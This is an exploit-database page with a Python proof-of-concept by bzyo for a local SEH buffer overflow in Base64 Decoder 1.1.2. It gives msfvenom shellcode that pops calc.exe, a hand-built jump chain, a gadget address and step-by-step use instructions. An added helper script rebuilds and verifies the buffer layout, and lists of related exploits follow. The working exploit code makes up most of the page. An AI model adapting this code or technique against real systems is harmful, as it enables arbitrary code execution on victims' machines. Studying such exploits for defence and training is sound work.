
"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)"

Author: bzyo

Platform: windows

Release date: 2018-12-20

#!/usr/bin/env python

# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)
# Date: 12-20-18
# Vulnerable Software: Base64 Decoder 1.1.2
# Vendor Homepage: http://4mhz.de/b64dec.html
# Version: 1.1.2
# Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip
# Tested on Windows 7 SP1 x86

# PoC
# 1. run script
# 2. copy/paste base.txt contents into 'save to file' section of app
# 3. select decode
# 4. pop calc

# orig dos poc from UN_NON, EDB: 39070

# Buffer layout (offsets in bytes):
#   0    junk3  90 x 0x41 (inc ecx), a harmless slide into the shellcode
#   90   calc   448-byte alphanumeric windows/exec payload
#   538  junk2  50 x 0xcc
#   588  jmp3   E9 rel32, near jump back 593 bytes to offset 0 (start of junk3)
#   594  junk1  20 x 0xcc
#   614  jmp2   EB rel8, short jump back 28 bytes to jmp3
#   620  jmp1   EB rel8, short jump back 8 bytes to jmp2 (this is nSEH)
#   624  seh    pop esi # pop ebx # ret, which resumes execution at nSEH
# All literals are bytes so the script runs unchanged under Python 2 and Python 3.

import struct

junk3 = b"\x41" * 90

#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
#Payload size: 448 bytes
calc = (b"\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
b"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
b"\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b"
b"\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70"
b"\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62"
b"\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f"
b"\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69"
b"\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42"
b"\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c"
b"\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61"
b"\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57"
b"\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b"
b"\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64"
b"\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53"
b"\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61"
b"\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b"
b"\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e"
b"\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74"
b"\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b"
b"\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b"
b"\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73"
b"\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f"
b"\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31"
b"\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45"
b"\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50"
b"\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a"
b"\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53"
b"\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41")

junk2 = b"\xcc"*50

#jump to calc: E9 af fd ff ff = jmp rel32 -593, from offset 588 to offset 0 (the 0x41 slide)
jmp3 = b"\xe9\xaf\xfd\xff\xff\xcc"

junk1 = b"\xcc"*20

#jump to jmp3: EB e4 = jmp short -28
jmp2 = b"\xeb\xe4\xcc\xcc\xcc\xcc"

#jump to jmp2: EB f8 = jmp short -8; these 4 bytes overwrite nSEH
jmp1 = b"\xeb\xf8\xcc\xcc"

#0x0045241e : pop esi # pop ebx # ret
seh = struct.pack('<L',0x0045241e)

buffer = junk3 + calc + junk2 + jmp3 + junk1 + jmp2 + jmp1 + seh

# Drop the trailing 0x00 of the packed SEH address: null is a bad character
# for this input (see the msfvenom -b list), and since it is the very last
# byte of the buffer the pasted string's own terminator takes its place.
with open("base.txt","wb") as f:
    f.write(buffer[:-1])
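The script above hard-codes the three relative jumps, and a rel8/rel32 that is off by a few bytes lands in junk instead of the shellcode. The following is an added verification helper written for this page, not part of bzyo's exploit: it rebuilds the same segment layout and sizes, computes the jump encodings from the segment sizes instead of hard-coding them, follows the chain from nSEH the way the CPU would, and scans for the msfvenom bad characters, which shows why the exploit writes buffer[:-1]. A 448-byte 0x90 placeholder stands in for the alphanumeric payload; the function names and the placeholder are this example's own. Python 3.

```python
import struct

# Bad characters from the msfvenom line in the exploit.
BADCHARS = b"\x00\x0a\x0d\x0e"


def short_jmp(src, dst, pad=0):
    """Encode EB rel8. rel8 is relative to the end of the 2-byte instruction."""
    rel = dst - (src + 2)
    if not -128 <= rel <= 127:
        raise ValueError("short jump out of range: %d" % rel)
    return b"\xeb" + struct.pack("<b", rel) + b"\xcc" * pad


def near_jmp(src, dst, pad=0):
    """Encode E9 rel32. rel32 is relative to the end of the 5-byte instruction."""
    rel = dst - (src + 5)
    return b"\xe9" + struct.pack("<i", rel) + b"\xcc" * pad


def decode_jmp(buf, off):
    """Return the target offset of the jmp at buf[off], or None if that byte is not EB/E9."""
    op = buf[off]
    if op == 0xEB:
        return off + 2 + struct.unpack("<b", buf[off + 1:off + 2])[0]
    if op == 0xE9:
        return off + 5 + struct.unpack("<i", buf[off + 1:off + 5])[0]
    return None


def trace_chain(buf, start, limit=16):
    """Follow jmps from `start`; return every offset visited, ending at the first non-jmp byte."""
    path = [start]
    off = start
    for _ in range(limit):
        tgt = decode_jmp(buf, off)
        if tgt is None or not 0 <= tgt < len(buf):
            break
        path.append(tgt)
        off = tgt
    return path


def find_badchars(buf, bad=BADCHARS):
    """List (offset, value) for every byte of buf that is in the bad-character set."""
    return [(i, b) for i, b in enumerate(buf) if b in bad]


def build_buffer(shellcode, seh_addr=0x0045241e):
    """Same segment order and sizes as the exploit; jump encodings are computed, not hard-coded."""
    junk3 = b"\x41" * 90                      # inc ecx slide, the jump chain's final target
    junk2 = b"\xcc" * 50
    junk1 = b"\xcc" * 20
    off_jmp3 = len(junk3) + len(shellcode) + len(junk2)   # 588 with a 448-byte payload
    off_jmp2 = off_jmp3 + 6 + len(junk1)                   # 614
    off_nseh = off_jmp2 + 6                                # 620, where nSEH lands
    jmp3 = near_jmp(off_jmp3, 0, pad=1)                    # back to offset 0
    jmp2 = short_jmp(off_jmp2, off_jmp3, pad=4)
    jmp1 = short_jmp(off_nseh, off_jmp2, pad=2)            # nSEH: short jump back to jmp2
    seh = struct.pack("<L", seh_addr)                      # pop esi # pop ebx # ret
    buf = junk3 + shellcode + junk2 + jmp3 + junk1 + jmp2 + jmp1 + seh
    return buf, off_nseh


if __name__ == "__main__":
    placeholder = b"\x90" * 448   # constructed stand-in for the 448-byte alpha_mixed payload
    buf, nseh = build_buffer(placeholder)
    print("chain from nSEH:", trace_chain(buf, nseh))
    print("bad chars (full buffer):", find_badchars(buf))
    print("bad chars (buffer[:-1]):", find_badchars(buf[:-1]))
```

Run as-is the chain prints [620, 614, 588, 0], i.e. nSEH to jmp2 to jmp3 to the start of the 0x41 slide, and the only bad byte in the full buffer is the null at offset 627, the high byte of 0x0045241e, which is exactly the byte the exploit trims. Substituting a different gadget address or payload size and re-running the trace is a faster check than single-stepping in a debugger.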
Other recent Windows exploits

Release Date | Title                                                                                    | Type  | Platform | Author
2020-07-09   | FrootVPN 4.8 - 'frootvpn' Unquoted Service Path                                          | local | windows  | v3n0m
2020-07-06   | Fire Web Server 0.1 - Remote Denial of Service (PoC)                                     | dos   | windows  | Saeed reza Zamanian
2020-07-01   | RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)  | local | windows  | Paras Bhatia
2020-06-26   | KiteService 1.2020.618.0 - Unquoted Service Path                                         | local | windows  | Marcos Antonio León
2020-06-26   | Windscribe 1.83 - 'WindscribeService' Unquoted Service Path                              | local | windows  | Ethan Seow
2020-06-23   | Code Blocks 20.03 - Denial Of Service (PoC)                                              | dos   | windows  | Paras Bhatia
2020-06-23   | Lansweeper 7.2 - Incorrect Access Control                                                | local | windows  | Amel BOUZIANE-LEBLOND
2020-06-22   | Frigate 2.02 - Denial Of Service (PoC)                                                   | dos   | windows  | Paras Bhatia
2020-06-17   | Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)              | local | windows  | Paras Bhatia
2020-06-16   | Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path                  | local | windows  | boku

Other exploits by bzyo

Release Date | Title                                                                                    | Type     | Platform    | Author
2020-04-20   | Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)                                            | local    | windows     | bzyo
2019-05-17   | Iperius Backup 6.1.0 - Privilege Escalation                                              | local    | windows     | bzyo
2019-05-06   | NSClient++ 0.5.2.35 - Privilege Escalation                                               | local    | windows     | bzyo
2019-02-14   | exacqVision ESM 5.12.2 - Privilege Escalation                                            | local    | windows     | bzyo
2019-01-30   | 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)      | local    | windows     | bzyo
2019-01-28   | Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)                   | local    | windows     | bzyo
2019-01-11   | Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)                                | local    | windows     | bzyo
2019-01-10   | RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)                                     | local    | windows     | bzyo
2018-12-27   | Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)                              | local    | windows_x86 | bzyo
2018-12-27   | MAGIX Music Editor 3.1 - Buffer Overflow (SEH)                                           | local    | windows_x86 | bzyo
2018-12-27   | Iperius Backup 5.8.1 - Buffer Overflow (SEH)                                             | local    | windows_x86 | bzyo
2018-12-20   | LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)                                     | local    | windows_x86 | bzyo
2018-12-20   | Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)                                       | local    | windows     | bzyo
2018-12-11   | PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion                                     | webapps  | multiple    | bzyo
2018-09-12   | SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)                        | webapps  | windows     | bzyo
2018-09-12   | SynaMan 4.0 build 1488 - SMTP Credential Disclosure                                      | webapps  | windows     | bzyo
2018-08-06   | AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)                                    | local    | windows     | bzyo
2018-07-23   | Splinterware System Scheduler Pro 5.12 - Privilege Escalation                            | local    | windows     | bzyo
2018-07-23   | Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)                           | local    | windows     | bzyo
2018-05-06   | HWiNFO 5.82-3410 - Denial of Service                                                     | dos      | windows     | bzyo
2018-04-24   | RGui 3.4.4 - Local Buffer Overflow                                                       | local    | windows     | bzyo
2018-04-18   | Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities                                  | webapps  | xml         | bzyo
2018-04-17   | Reaper 5.78 - Local Buffer Overflow                                                      | local    | windows     | bzyo
2018-04-09   | GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)                                      | local    | windows     | bzyo
2018-04-02   | WebLog Expert Enterprise 9.4 - Privilege Escalation                                      | local    | windows     | bzyo
2018-03-26   | LabF nfsAxe 3.7 - Privilege Escalation                                                   | local    | windows     | bzyo
2018-03-23   | WM Recorder 16.8.1 - Denial of Service                                                   | dos      | windows     | bzyo
2018-03-05   | Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow                    | local    | windows     | bzyo
2018-03-02   | IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)                              | local    | windows     | bzyo
2018-03-02   | IrfanView 4.44 Email Plugin - Buffer Overflow (SEH)                                      | local    | windows     | bzyo